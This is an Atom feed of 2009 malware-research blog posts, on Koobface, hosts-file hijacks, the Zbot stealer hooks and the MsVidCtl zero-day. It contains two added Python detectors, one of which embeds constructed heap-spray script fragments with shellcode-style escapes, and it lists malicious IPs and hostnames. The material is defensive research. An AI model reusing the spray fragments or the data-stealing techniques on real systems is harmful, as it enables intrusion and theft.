<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:georss="http://www.georss.org/georss" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0"><id>tag:blogger.com,1999:blog-4791623931968320973</id><updated>2009-07-11T11:03:16.479-07:00</updated><title type="text">ThreatFire Research Blog</title><subtitle type="html">Blog from the threat research team at ThreatFire.</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://blog.threatfire.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://blog.threatfire.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default?start-index=26&amp;max-results=25" /><author><name>Charles Windhausen</name><uri>http://www.blogger.com/profile/03072584665970075881</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>228</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><link rel="self" href="http://feeds.feedburner.com/ThreatfireResearchBlog" type="application/atom+xml" /><feedburner:emailServiceId>ThreatfireResearchBlog</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-2252614585932332048</id><published>2009-07-10T07:51:00.000-07:00</published><updated>2009-07-10T09:06:09.971-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Koobface" /><category scheme="http://www.blogger.com/atom/ns#" term="Spam" /><category 
scheme="http://www.blogger.com/atom/ns#" term="Virut" /><category scheme="http://www.blogger.com/atom/ns#" term="Click Fraud" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><title type="text">@stealyourmoney -- TweetFace Has a Tinyurl 4u</title><content type="html">&lt;a href="http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm" target="_blank"&gt;Koobface&lt;/a&gt; joined the Twittersphere, and the Twittersphere is fighting back. It's good to see a response from the social networking infrastructure.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=976dbfa0d8d0614508be4053b4153d45" target="_blank"&gt;Koobface&lt;/a&gt; has been distributed in volume for around a year now, and the ThreatFire community has been protected from it all along. If you want to keep it off your system, be careful of what you download and add a behavioral solution like &lt;a href="http://www.threatfire.com" target="_blank"&gt;ThreatFire&lt;/a&gt; to your system's security layers.&lt;br /&gt;&lt;br /&gt;The Koobface family has been distributed in a couple of ways since June/July 2008, increasing its prevalence to significant volumes in &lt;a href="http://blog.threatfire.com/2008/12/koobface-on-loose-as-flashupdateexe.html" target="_blank"&gt;December&lt;/a&gt; of last year. It started out as a standalone worm &lt;a href="http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html" target="_blank"&gt;menacing&lt;/a&gt; the huge user bases of a handful of social networks, &lt;a href="http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html" target="_blank"&gt;defeating CAPTCHA&lt;/a&gt;, and downloading more malware to compromised systems. 
Now it is more often dropped as one component of a larger package by exploit pages hosted on malicious web sites, alongside other payloads: Virut, click fraud components, spambots (Waledac) and scareware. Koobface can be a secondary method of propagation for these various malware distribution groups.&lt;br /&gt;&lt;br /&gt;So it was only a matter of time before the developers figured out that Twitter is another popular Web 2.0 medium. They also figured out that Tinyurl is one way to obfuscate malicious URLs and distribute them across tweets.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sldg4Ny_09I/AAAAAAAAA4Y/FY8fMnmG09g/s1600-h/Tweet.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 304px; height: 55px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sldg4Ny_09I/AAAAAAAAA4Y/FY8fMnmG09g/s320/Tweet.png" alt="" id="BLOGGER_PHOTO_ID_5356856800672994258" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;These URLs lead to the standard phony codec page that is a trademark of the group. This time it reads "Video posted by -WizArD-"; the site remains up:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldfHbhViAI/AAAAAAAAA4Q/havaCgceqDk/s1600-h/Video_posted_by_Wizard.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 261px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldfHbhViAI/AAAAAAAAA4Q/havaCgceqDk/s320/Video_posted_by_Wizard.png" alt="" id="BLOGGER_PHOTO_ID_5356854863031797762" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;When setup.exe is downloaded from 98.217.161.163 and run, the user of course does not get the promised Adobe Flash Player update. 
Instead, they get an updated version of the Koobface &lt;a href="http://www.threatexpert.com/report.aspx?md5=976dbfa0d8d0614508be4053b4153d45" target="_blank"&gt;worm&lt;/a&gt;. Along with the worm, the compromised system eventually is redirected to a &lt;a href="http://www.threatexpert.com/report.aspx?md5=51371612196721b8dc1f28db96c29e26" target="_blank"&gt;FakeAv&lt;/a&gt; offer, so the group can make its money:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/SldkW0qaNkI/AAAAAAAAA4g/9y7GNPOQFvA/s1600-h/LameScan.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 251px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/SldkW0qaNkI/AAAAAAAAA4g/9y7GNPOQFvA/s320/LameScan.png" alt="" id="BLOGGER_PHOTO_ID_5356860625036916290" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This morning, accounts tweeting the "My home video :) " message with a tinyurl leading to the "Video posted by -Wizard-" are receiving some cleanup attention:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldcbESi6lI/AAAAAAAAA4I/OdaPk63Utfs/s1600-h/MoseyAlongNow.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 278px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldcbESi6lI/AAAAAAAAA4I/OdaPk63Utfs/s320/MoseyAlongNow.png" alt="" id="BLOGGER_PHOTO_ID_5356851901858245202" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Tinyurl has been disabled as well.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-2252614585932332048?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/FoMzOGPE-ho" height="1" 
width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/2252614585932332048/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=2252614585932332048" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/2252614585932332048" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/2252614585932332048" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/FoMzOGPE-ho/stealyourmoney-tweetface-has-tinyurl-4u.html" title="@stealyourmoney -- TweetFace Has a Tinyurl 4u" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sldg4Ny_09I/AAAAAAAAA4Y/FY8fMnmG09g/s72-c/Tweet.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/stealyourmoney-tweetface-has-tinyurl-4u.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-4552193002208935282</id><published>2009-07-09T14:15:00.000-07:00</published><updated>2009-07-10T15:49:39.569-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Social Engineering" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">itsecure.microsoft.com?</title><content type="html">Your browser could be redirected to 
antivir-systempro.com, and you could be fooled into buying something from a spoofed website following a drive-by attack on your system. Or a piece of malware could edit your hosts file and then open a window to a legitimate-looking URL. Here is a short, currently active list of hosts file modifications made by some &lt;a href="http://www.threatexpert.com/report.aspx?md5=5edd87d4d271e8e4b5244c6aee787101" target="_blank"&gt;active malware&lt;/a&gt;:&lt;br /&gt;209.44.111.62 itsecure.microsoft.com&lt;br /&gt;209.44.111.62 avremover-pro.com&lt;br /&gt;209.44.111.62 www.avremover-pro.com&lt;br /&gt;&lt;br /&gt;We've posted before on ugly &lt;a href="http://blog.threatfire.com/2009/02/browser-securitymicrosoftcom-hosts-file.html" target="_blank"&gt;hosts&lt;/a&gt; file &lt;a href="http://blog.threatfire.com/2009/03/hosts-file-modifications-lead-to-phony.html" target="_blank"&gt;modifications&lt;/a&gt;, and on the authors' intent of duping users into believing they are downloading something from a legitimate site. The current scheme is in the same vein.&lt;br /&gt;&lt;br /&gt;Note that the IP address 209.44.111.62, which these entries map "itsecure.microsoft.com" to, has nothing to do with Microsoft's legitimate web presence. Because the resolver consults the hosts file before asking DNS, the browser shows the trusted-looking name while the connection actually goes to the attacker's server.&lt;br /&gt;&lt;br /&gt;
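A small checker for the hosts-file trick described above. This is an added example, not code from the ThreatFire post or any vendor product: it scans hosts-file text for a vendor hostname mapped to a non-loopback address, and for several unrelated hostnames pinned to the same outside address, which is exactly the shape of the three entries quoted above. The WATCHED_SUFFIXES list and the SAMPLE_HOSTS text are constructed for the example.

```python
"""Flag suspicious Windows hosts-file entries (added example, not ThreatFire code)."""
import ipaddress
from collections import defaultdict

# Domains a clean hosts file has no business redirecting. Assumed list; a real
# deployment would load a maintained one.
WATCHED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "google.com")

# Constructed sample modelled on the entries quoted in the post.
SAMPLE_HOSTS = """# constructed sample hosts file
127.0.0.1       localhost
0.0.0.0         ads.example.net        # adblock-style sinkhole, harmless
209.44.111.62   itsecure.microsoft.com
209.44.111.62   avremover-pro.com
209.44.111.62   www.avremover-pro.com
"""


def parse_hosts(text):
    """Return (ip, hostname) pairs; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) > 1:                  # an address followed by one or more names
            for name in parts[1:]:
                entries.append((parts[0], name.lower().rstrip(".")))
    return entries


def is_local(ip):
    """True for loopback and unspecified addresses (127.x, ::1, 0.0.0.0)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified


def is_watched(name):
    """Exact or subdomain match against the watched suffixes, so evilmicrosoft.com does not count."""
    return any(name == s or name.endswith("." + s) for s in WATCHED_SUFFIXES)


def registrable(name):
    """Crude eTLD+1 (last two labels); good enough for the .com names in the post."""
    return ".".join(name.split(".")[-2:])


def suspicious_entries(text, min_cluster=2):
    """Return (ip, names, reason) findings for non-local redirections."""
    findings = []
    by_ip = defaultdict(set)
    for ip, name in parse_hosts(text):
        if is_local(ip):
            continue                        # sinkhole entries are not redirections
        by_ip[ip].add(name)
        if is_watched(name):
            findings.append((ip, name, "watched domain pinned to non-local address"))
    for ip, names in sorted(by_ip.items()):
        roots = {registrable(n) for n in names}
        if len(roots) >= min_cluster:
            findings.append((ip, ",".join(sorted(names)),
                             "unrelated names share one outside address"))
    return findings


if __name__ == "__main__":
    for ip, what, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"{ip:16} {reason}: {what}")
```

The watched-domain rule is the strong signal; the shared-address rule is only a hint, since a corporate hosts file legitimately maps several internal names to one server, so tune min_cluster or whitelist internal ranges before alerting on it.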
Currently, this scheme leads to FakeAv "Antivirus System PRO":&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/SlZfYmy7kPI/AAAAAAAAA4A/DzZLZvvKwf4/s1600-h/itsecure.microsoft.com.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 211px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/SlZfYmy7kPI/AAAAAAAAA4A/DzZLZvvKwf4/s320/itsecure.microsoft.com.png" alt="" id="BLOGGER_PHOTO_ID_5356573683139449074" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-4552193002208935282?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/eBtvy_4JRFo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/4552193002208935282/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=4552193002208935282" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/4552193002208935282" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/4552193002208935282" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/eBtvy_4JRFo/itsecuremicrosoftcom.html" title="itsecure.microsoft.com?" 
/><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_YaXoRZbsXc4/SlZfYmy7kPI/AAAAAAAAA4A/DzZLZvvKwf4/s72-c/itsecure.microsoft.com.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/itsecuremicrosoftcom.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-702406578535449650</id><published>2009-07-09T11:55:00.000-07:00</published><updated>2009-07-09T12:11:17.636-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Undetected malware" /><category scheme="http://www.blogger.com/atom/ns#" term="Rogueware" /><category scheme="http://www.blogger.com/atom/ns#" term="FakeAlert" /><title type="text">Streamviewer.exe, Tubeviewer.exe, Tubeplayer.exe, now Onlinemovies.exe!</title><content type="html">The gang serving up malicious &lt;a href="http://blog.threatfire.com/2009/06/softwarefortubeview-moves-to-new-home.html" target="_blank"&gt;downloaders&lt;/a&gt; from a couple of servers just spiced things up, adding "onlinemovies.40008.exe" to the list of obnoxious files served from 64.20.38.172 alongside &lt;a href="http://blog.threatfire.com/2009/06/streamviewers-gif-images-embedded-with.html" target="_blank"&gt;streamviewer&lt;/a&gt; and &lt;a href="http://blog.threatfire.com/2009/05/softwarefortubeview-codec-schemes.html" target="_blank"&gt;softwarefortubeview&lt;/a&gt;. AV detection is very low. 
It seems the ISPs may be acting on public information -- the sites were up for only a short time today, and ThreatFire protected the community from this prevalent malware all morning.&lt;br /&gt;&lt;br /&gt;Related names currently resolving to that address include:&lt;br /&gt;exe-dot.com&lt;br /&gt;exe-site.com&lt;br /&gt;my-exe-load.com&lt;br /&gt;red-exe.com&lt;br /&gt;soft-exe.net&lt;br /&gt;tiaexe.com&lt;br /&gt;&lt;br /&gt;The group seems to be branching out from the phony movie player theme, more often packaging the downloader into serial generators and crack installers like serial.dragon.naturally.speaking.9.45042.exe and crack.sony.vegas.platinum.edition.9.0.45057.exe. Pirates and P2P users need to be careful of what they download and run.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-702406578535449650?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/EKH_VjdKH8o" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/702406578535449650/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=702406578535449650" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/702406578535449650" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/702406578535449650" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/EKH_VjdKH8o/streamviewerexe-tubeviewerexe.html" title="Streamviewer.exe, Tubeviewer.exe, Tubeplayer.exe, now Onlinemovies.exe!" 
/><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/streamviewerexe-tubeviewerexe.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-8817687942813014788</id><published>2009-07-09T10:31:00.000-07:00</published><updated>2009-07-09T12:13:51.085-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Dropper" /><category scheme="http://www.blogger.com/atom/ns#" term="Bot" /><category scheme="http://www.blogger.com/atom/ns#" term="Government and Cybersecurity" /><title type="text">South Korea and U.S. Government Sustained DDoS</title><content type="html">The botnet-driven &lt;a href="http://www.nytimes.com/2009/07/09/technology/09cyber.html?ref=global-home" target="_blank"&gt;distributed denial of service attack&lt;/a&gt; that started over the weekend has been hammering U.S. web sites including the White House, the FTC, the NYSE, the FAA, the NSA, the Department of Homeland Security, the Treasury and many more agency sites, which is a pretty bold thing to do. The botnet also has many South Korean web sites in its crosshairs, including the president's and various news and commerce sites.&lt;br /&gt;&lt;br /&gt;We are examining the binaries involved. ThreatFire could have protected the infected systems from the bot by stopping its dropper, and in turn prevented at least some of the flood against these U.S. and South Korean web sites. 
The underlying code itself appears to be fairly unsophisticated.&lt;br /&gt;&lt;br /&gt;One of the malicious DoS components is delivered unpacked, sets itself up as a service, and carries a handful of commonly used user agent strings to camouflage its GET and POST traffic. Interestingly, the HTTP headers it sends include "Accept-Language: ko" and "UA-CPU: x86", a combination that makes a usable network indicator for this flood. We are also looking into an unusual dependency on pcap: the malware imports pcap_open, pcap_sendpacket and other functions, apparently to emit raw packets, though it uses ordinary Winsock calls for the rest of its network activity.&lt;br /&gt;Here it uses an extremely common registry editing technique to disable the compromised host's Windows firewall:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/SlYvasgQUbI/AAAAAAAAA34/asFEfOtgwdc/s1600-h/DisableFirewall.png" target="_blank"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 194px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/SlYvasgQUbI/AAAAAAAAA34/asFEfOtgwdc/s320/DisableFirewall.png" alt="" id="BLOGGER_PHOTO_ID_5356520942473335218" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In the &lt;a href="http://tech.yahoo.com/news/nm/20090709/tc_nm/us_korea_south_internet_19" target="_blank"&gt;meantime&lt;/a&gt;, governments, network operators and web masters in both countries are working to tame this thing.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-8817687942813014788?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/U_prik6MnJI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/8817687942813014788/comments/default" title="Post Comments" /><link rel="replies" type="text/html" 
href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=8817687942813014788" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8817687942813014788" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8817687942813014788" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/U_prik6MnJI/south-korea-and-us-government-sustained.html" title="South Korea and U.S. Government Sustained DDoS" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_YaXoRZbsXc4/SlYvasgQUbI/AAAAAAAAA34/asFEfOtgwdc/s72-c/DisableFirewall.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/south-korea-and-us-government-sustained.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-8561259825815340744</id><published>2009-07-08T15:49:00.000-07:00</published><updated>2009-07-08T17:22:22.874-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ZBot" /><title type="text">Michael Jackson Zbot Data Stealing Hooks</title><content type="html">The &lt;a href="http://blog.threatfire.com/2009/07/michael-jackson-x-files-answer.html" target="_blank"&gt;recent Michael Jackson Zbot variant&lt;/a&gt; implements a variety of IAT hooks to perform its data stealing and stealth on victims' compromised systems. Its user-mode hook techniques have been described as "implemented properly" for malicious user-mode hooks. 
The Zbot releases have changed in various ways over time, and a couple of new additions reveal ongoing development by the same writers.&lt;br /&gt;&lt;br /&gt;The Zbot family continues to use multistaged component injection to achieve its final goal of stealing sensitive and confidential information off the machine. It attempts to kill off two fairly prevalent firewalls at startup, functionality that seems to be present across all Zbot releases. It also continues to hide its on-disk components by hooking NtQueryDirectoryFile in ntdll, and still uses much the same set of hooked ntdll calls as the original release as its basis for planting further hooks (hooking the loader functions lets it re-plant its hooks in each module as it is loaded and its imports are resolved):&lt;br /&gt;LdrLoadDll&lt;br /&gt;LdrGetProcedureAddress&lt;br /&gt;NtCreateThread&lt;br /&gt;&lt;br /&gt;Two hooks have been a constant part of the ongoing releases for stealing data:&lt;br /&gt;GetClipboardData – has always been used to steal information from the clipboard; copying and pasting your username/password won't get past this malware.&lt;br /&gt;TranslateMessage – buffers keyboard input from window messages, converts the input to Unicode, and sends it to the controller process’s pipe to be shipped off the victim's machine.&lt;br /&gt;&lt;br /&gt;Two newer hooks are related to what is known as screen scraping:&lt;br /&gt;BeginPaint/EndPaint – appear to be designed to decide when to trigger the screenshot functionality found in the DefWindowProcW hook.&lt;br /&gt;DefWindowProcW – the mechanism that extracts a device context from a window and generates a bitmap from it. 
In other words, this functionality is used to take screenshots on the victim's machine as they are using it.&lt;br /&gt;&lt;br /&gt;All in all, Zbot is one of the nastier malware families in circulation with a fairly regular release cycle and is &lt;a href="http://voices.washingtonpost.com/securityfix/2009/07/an_odyssey_of_fraud_part_ii.html" target="_blank"&gt;actively used by cybercrooks&lt;/a&gt;. ThreatFire has been effectively preventing this malicious family from stealing information for a couple of years now.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4791623931968320973-8561259825815340744?l=blog.threatfire.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ThreatfireResearchBlog/~4/7sZTgTWiLVw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.threatfire.com/feeds/8561259825815340744/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=4791623931968320973&amp;postID=8561259825815340744" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8561259825815340744" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4791623931968320973/posts/default/8561259825815340744" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/ThreatfireResearchBlog/~3/7sZTgTWiLVw/michael-jackson-zbot-data-stealing.html" title="Michael Jackson Zbot Data Stealing Hooks" /><author><name>ThreatFire Blogger</name><uri>http://www.blogger.com/profile/02520640955013507047</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="13839882541104122155" /></author><thr:total 
xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.threatfire.com/2009/07/michael-jackson-zbot-data-stealing.html</feedburner:origLink></entry><entry><id>tag:blogger.com,1999:blog-4791623931968320973.post-7431765013037890986</id><published>2009-07-08T10:07:00.000-07:00</published><updated>2009-07-08T14:16:42.293-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="0day" /><title type="text">ActiveX MsVidCtl 0day</title><content type="html">The &lt;a href="http://www.microsoft.com/technet/security/advisory/972890.mspx" target="_blank"&gt;MsVidCtl 0day&lt;/a&gt; has been passed around and widely distributed since at least the 6th. We have been monitoring multiple groups abusing the Internet Explorer control for rendering streaming video.&lt;br /&gt;&lt;br /&gt;Some of the more interesting recent activity has been the exploit writers' JavaScript evasion: splitting what was one page of JavaScript into 10 files, one per line, which renders per-file pattern matching useless. This sort of evasion is most effective against the most performance-sensitive security layers, such as network-based ones, and against some fairly unsophisticated client-side solutions.&lt;br /&gt;&lt;br /&gt;The payloads vary, from adware to social network credential stealing. ThreatFire has been preventing the exploit within the community from the start. We anxiously await a hotfix, something past the &lt;a href="http://support.microsoft.com/kb/972890" target="_blank"&gt;killbit workaround&lt;/a&gt;. Georg Wicherski &lt;a href="http://www.threatpost.com/blogs/demo-exploiting-microsoft-msvidctl-directshow-flaw" target="_blank"&gt;points out&lt;/a&gt; that the vulnerability is a trivial one, in which the attacker can abuse the &lt;a href="http://blog.threatfire.com/2007/08/how-do-storm-notfound-and-other-threats.html" target="_blank"&gt;SEH handler&lt;/a&gt;. 
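The split-script evasion described above, shown from the detection side. This is an added example, not code from the ThreatFire post, and none of the script text below is captured exploit code: the five one-line fragments, the include order and the two-part spray signature are all constructed. Per-file scanning sees a %u-escaped blob in one file and an array-fill loop in another and matches neither; reassembling the includes in document order before matching restores the hit. It goes a little beyond the post's ten-file case in that it handles any number of fragments and shows that preserving document order matters.

```python
"""Reassemble a script split across many files before signature matching (added example)."""
import re

# Two-part signature for a classic heap spray: a %u-escaped blob, then a loop
# that fills an array by concatenating two variables. Both parts must be present.
# Constructed for this example; not a production rule.
SPRAY_SIGNATURE = re.compile(
    r'unescape\("%u[0-9a-fA-F]{4}.*?\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+\s*;',
    re.S,
)

# Constructed landing page: the include order as extracted from the page's
# script src attributes (extraction assumed done upstream) and the fetched bodies,
# one line of script per file, as the post describes.
INCLUDE_ORDER = ["a.js", "b.js", "c.js", "d.js", "e.js"]
FETCHED = {
    "a.js": 'var sc = unescape("%u9090%u9090%uc931%ue983");\n',
    "b.js": 'var nop = unescape("%u0c0c%u0c0c");\n',
    "c.js": 'var heap = new Array();\n',
    "d.js": 'for (var i = 0; i != 200; i++) { heap[i] = nop + sc; }\n',
    "e.js": 'document.getElementById("v").data = heap[0];\n',
}


def match_per_file(fetched):
    """Names of files that match on their own: what a per-file scanner would see."""
    return [name for name, body in fetched.items() if SPRAY_SIGNATURE.search(body)]


def match_reassembled(order, fetched):
    """Concatenate the includes in document order, then match the whole script."""
    script = "".join(fetched[name] for name in order if name in fetched)
    return SPRAY_SIGNATURE.search(script) is not None


if __name__ == "__main__":
    print("per-file hits:", match_per_file(FETCHED))
    print("reassembled hit:", match_reassembled(INCLUDE_ORDER, FETCHED))
```

The reassembly step is what a network-layer or per-object scanner lacks: it has to buffer every script include for the page and rejoin them in the order the HTML references them, which is exactly the cost the attackers are betting such layers will not pay.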
